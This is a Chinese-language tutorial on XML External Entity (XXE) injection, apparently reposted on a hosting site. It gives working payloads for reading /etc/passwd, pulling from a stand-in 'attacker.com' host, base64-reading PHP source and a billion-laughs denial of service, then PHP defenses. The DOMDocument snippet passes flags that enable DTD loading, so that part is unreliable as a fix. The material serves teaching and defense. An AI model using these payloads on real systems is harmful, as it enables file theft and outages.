科普:XXE注入攻击与防御

0×00 前言

XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进⾏行处理时引发的安全问题.

[[115831]]

在XML1.0标准⾥里,XML文档结构⾥里定义了实体(entity)这个概念.实体可以通过预定义在文档中调用,实体的标识符可访问本地或远程内容.如果在这个过程中引入了”污染”源,在对XML文档处理后则可能导致信息泄漏等安全问题.

0×01 威胁

XXE漏洞目前还未受到广泛关注,Wooyun上几个XXE引起的安全问题:

pull-in任意文件遍历/下载
从开源中国的某XXE漏洞到主站shell
百度某功能XML实体注入
百度某功能XML实体注入(二)

借助XXE,攻击者可以实现任意文件读取,DOS拒绝服务攻击以及代理扫描内网等.

对于不同XML解析器,对外部实体有不同处理规则,在PHP中默认处理的函数为: xml_parse和simplexml_load xml_parse的实现方式为expat库,默认情况不会解析外部实体,而simplexml_load默认情况下会解析外部实体,造成安全威胁.除PHP外,在Java,Python等处理xml的组件及函数中都可能存在此问题

0×02 语法

要写Payload,首先要对XML实体语法有一定了解

XML中entity的定义语法为:

  1. <!DOCTYPE filename  
  2. [  
  3. <!ENTITY entity-name "entity-content"  
  4. ]> 

如果要引用一个外部资源,可以借助各种协议 几个例子:

  1. file:///path/to/file.ext  
  2. http://url/file.ext  
  3. php://filter/read=convert.base64-encode/resource=conf.php  

故构造几种简单的Payload模型如下:

  1. <?xml version="1.0" encoding="utf-8"?> 
  2. <!DOCTYPE xdsec [  
  3. <!ELEMENT methodname ANY > 
  4. <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 
  5. <methodcall> 
  6. <methodname>&xxe;</methodname> 
  7. </methodcall> 

亦可读取网站内容

  1. <?xml version="1.0" encoding="utf-8"?> 
  2. <!DOCTYPE xdsec [  
  3. <!ELEMENT methodname ANY > 
  4. <!ENTITY xxe SYSTEM "http://attacker.com/text.txt" >]> 
  5. <methodcall> 
  6. <methodname>&xxe;</methodname> 
  7. </methodcall> 

如果包含文件失败,可能是由于读取php等文件时文件本身包含的<等字符.可以使用Base64编码绕过,如:

  1. <?xml version="1.0" encoding="utf-8"?> 
  2. <!DOCTYPE xdsec [  
  3. <!ELEMENT methodname ANY > 
  4. <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >]> 
  5. <methodcall> 
  6. <methodname>&xxe;</methodname> 
  7. </methodcall> 

0×03 攻击

借助XXE,有几种可用且公开的攻击方式:

拒绝服务

POC

  1. <?xml version = "1.0"?> 
  2. <!DOCTYPE lolz [  
  3. <!ENTITY lol "lol"> 
  4. <!ELEMENT lolz (#PCDATA)> 
  5. <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> 
  6. <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> 
  7. <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> 
  8. <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> 
  9. <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> 
  10. <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> 
  11. <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> 
  12. <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> 
  13. <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]> 
  14. <lolz>&lol9;</lolz> 

POC中中先定义了lol实体,值为”lol”的字符串,后在下面又定义了lol2实体,lol2实体引用10个lol实体,lol3又引用了10个lol2实体的值,依此类推,到了最后在lolz元素中引用的lol9中,就会存在上亿个”lol”字符串此时解析数据时未做特别处理,即可能造成拒绝服务攻击。

此外还有一种可能造成拒绝服务的Payload,借助读取/dev/random实现.

内网信息

借助各种协议如http,XXE可以协助扫描内网,可能可以访问到内网开放WEB服务的Server,并获取其他信息

文件读取

最常规也是最有效的利用思路

  1. <?xml version="1.0" encoding="utf-8"?> 
  2. <!DOCTYPE xdsec [  
  3. <!ELEMENT methodname ANY > 
  4. <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 
  5. <methodcall> 
  6. <methodname>&xxe;</methodname> 
  7. </methodcall> 

附上两张截图,实现文件读取的过程

 

 

0×04 防御

1.检查所使用的底层xml解析库,默认禁止外部实体的解析

2.使用第三方应用代码及时升级补丁

3.同时增强对系统的监控,防止此问题被人利用

对于PHP,由于simplexml_load_string函数的XML解析问题出在libxml库上,所以加载实体前可以调用这样一个函数

  1. <?php 
  2. libxml_disable_entity_loader(true);  
  3. ?> 

以进行防护,对于XMLReader和DOM方式解析,可以参考如下代码:

  1. <?php // with the XMLReader functionality:  $doc = XMLReader::xml($badXml,'UTF-8',LIBXML_NONET);  // with the DOM functionality:  $dom = new DOMDocument();  $dom->loadXML($badXml,LIBXML_DTDLOAD|LIBXML_DTDATTR);  ?>>  

0×05 参考

https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)

http://websec.io/2012/08/27/Preventing-XEE-in-PHP.html

http://cn2.php.net/libxml_disable_entity_loader

http://projects.webappsec.org/w/page/13247004/XML%20Injection

http://drops.wooyun.org/papers/1911

文章来源网络,作者:管理,如若转载,请注明出处:https://shuyeidc.com/wp/133006.html<

(0)
管理的头像管理
上一篇2025-02-27 07:03
下一篇 2025-02-27 07:04

相关推荐

  • 云服务器和云虚拟主机怎么选?云服务器和虚拟主机区别

    云服务器适合业务增长快、需弹性扩展的场景,而云虚拟主机适合预算有限、技术门槛低的小型静态网站或测试环境,二者核心区别在于资源独享性与运维复杂度,核心差异解析:从底层架构到使用体验很多人容易混淆这两者,觉得它们都是“买空间建站”,它们的底层逻辑完全不同,云服务器(ECS)就像是你租了一整栋别墅,水电网络独立,你想……

    2026-06-29
    0
  • 赣州智慧旅游招聘是真的吗?赣州旅游人才招聘信息

    中级岗位(3-5年经验)月薪范围通常在6000-10000元,这类岗位需要独立负责项目模块,如独立运营一个抖音账号,或维护一个景区小程序的功能迭代,具备成功案例的候选人议价能力较强,高级岗位(5年以上经验)月薪范围通常在10000-20000元,部分核心管理岗可达更高,这类人才需要具备战略规划能力,如制定整个景……

    2026-06-29
    0
  • 赣州智能物联网车位锁如何管理?智能车位锁管理系统多少钱

    赣州智能物联网车位锁管理的核心在于通过云端平台实现远程控锁、状态实时监控及自动计费,彻底解决传统车位“被占难管”与“找位难”的痛点,在赣州这样的城市,随着机动车保有量的持续增长,老旧小区、商业综合体以及私人固定车位的资源矛盾日益凸显,传统的机械地锁或简易遥控锁,不仅操作繁琐,更无法实现数据化管理,引入智能物联网……

    2026-06-29
    0
  • 赣州智能消防栓好用吗,智能消防栓多少钱一个

    赣州智能消防栓通过物联网技术实现实时监测与远程报警,能显著降低火灾响应时间并提升城市消防安全管理水平,是目前智慧城市建设中不可或缺的基础设施,赣州智能消防栓的核心价值与应用场景传统消防栓往往存在“看不见、摸不着、用不了”的痛点,在赣州这样地形复杂、老城区与新城区并存的区域,传统设施的管理难度极大,智能消防栓的出……

    2026-06-29
    0
  • 云服务器和物理机到底有啥区别?

    云服务器本质上是虚拟化资源池中的弹性实例,而传统物理服务器是独占的硬件实体,前者胜在弹性与运维便捷,后者强在物理隔离与性能稳定,具体选择取决于业务对成本、扩展性及安全合规的权衡,很多人初次接触服务器时,容易把“云服务器”和“传统物理服务器”混为一谈,觉得它们都是用来跑网站或存数据的盒子,这两者的底层逻辑完全不同……

    2026-06-29
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注